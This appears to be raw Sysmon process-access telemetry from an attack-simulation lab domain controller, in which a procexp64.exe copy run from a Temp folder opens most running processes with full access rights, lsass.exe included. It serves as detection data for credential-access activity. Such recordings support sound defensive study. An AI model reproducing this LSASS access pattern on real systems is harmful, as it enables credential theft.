15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet 